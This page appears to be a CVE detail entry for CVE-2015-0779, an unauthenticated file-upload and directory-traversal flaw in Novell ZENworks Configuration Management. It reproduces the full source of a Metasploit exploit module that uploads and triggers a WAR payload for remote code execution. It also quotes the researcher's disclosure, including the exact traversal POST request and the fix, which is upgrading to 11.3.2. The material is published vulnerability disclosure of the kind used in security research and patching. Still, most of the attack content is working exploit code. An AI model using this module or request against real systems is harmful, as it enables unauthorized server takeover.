CVE-2015-0779 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ZENworks Configuration Management Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in Novell ZENworks Configuration Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in the UploadServlet which accepts unauthenticated file uploads and does not check the "uid" parameter for directory traversal characters. This allows an attacker to write anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack. This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a Metasploit exploit, but it abuses a different parameter of the same servlet. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0779'], ['OSVDB', '120382'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Apr/21'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => true, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Novell ZCM < v11.3.2 - Universal Java', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 7 2015')) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']), OptString.new('TOMCAT_PATH', [false, 'The Tomcat webapps traversal path (from the temp directory)']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'GET' }) if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def upload_war_and_exec(tomcat_path) app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s print_status("#{peer} - Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', 'data' => war_payload, 'ctype' => 'application/octet-stream', 'vars_get' => { 'uid' => tomcat_path, 'filename' => "#{app_base}.war" } }) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else print_error("#{peer} - Failed to upload, try again with a different path?") return false end 10.times do Rex.sleep(2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Failure. Unexpected answer break if res.code != 200 # Unless session... keep looping return true if session_created? end false end def exploit tomcat_paths = [] if datastore['TOMCAT_PATH'] tomcat_paths << datastore['TOMCAT_PATH'] end tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/']) tomcat_paths.each do |tomcat_path| break if upload_war_and_exec(tomcat_path) end end end

>> Remote code execution in Novell ZENworks Configuration Management 11.3.1 >> Discovered by Pedro Ribeiro ([email protected]), Agile Information Security ================================================================================= Disclosure: 07/04/2015 / Last updated: 07/04/2015 >> Background on the affected product: "Automate and accelerate your Windows 7 migration Microsoft estimates that it can take more than 20 hours to migrate a single machine to Windows 7. Novell ZENworks Configuration Management is ready to dramatically accelerate and automate every aspect of your Windows 7 migration efforts. Boost user productivity Use Novell ZENworks Configuration Management to make sure users always have access to the resources they need regardless of where they work or what devices they use. Eliminate IT effort Automatically enforce policies and dynamically manage resources with identity-based management of users as well as devices. Expand your freedom to choose Manage the lifecycles of all your current and future assets, with full support for Windows and Linux systems, Novell eDirectory, Active Directory, and more. Simplify deployment with virtual appliances Slash deployment times with a convenient virtual appliance deployment option. Enjoy a truly unified solution Centralize the management of all your devices into a single, unified and easy-to-use web-based ZENworks console—called ZENworks Control Center." This vulnerability is present in ZENworks Configuration Management (ZCM) which is part of the ZENworks Suite. A blast from the past? This is a similar vulnerability to ZDI-10-078 / OSVDB-63412, but it abuses a different parameter of the same servlet. However this time Novell: - Did not bother issuing a security advisory to their customers. - Did not credit me even though I did responsible disclosure. - Refused to provide a CVE number for months. - Did not update their ZENworks Suite Trial software with the fix (you can download it now from their site, install and test the PoC / Metasploit module). - Does not list the fix in the ZCM 11.3.2 update information (https://www.novell.com/support/kb/doc.php?id=7015776). >> Technical details: Vulnerability: Remote code execution via file upload and directory traversal CVE-2015-0779 Constraints: none; no authentication or any other information needed Affected versions: ZENworks Configuration Management 11.3.1 and below POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war <WAR file payload in the body> The WAR file will be automatically deployed to the server (on certain Windows and Linux installations the path can be "../webapps/"). A Metasploit module that exploits this vulnerability has been released. >> Fix: Upgrade to version ZENworks Configuration Management 11.3.2. [1]: https://github.com/pedrib/PoC/blob/master/generic/zenworks_zcm_rce.txt [2]: https://github.com/rapid7/metasploit-framework/pull/5096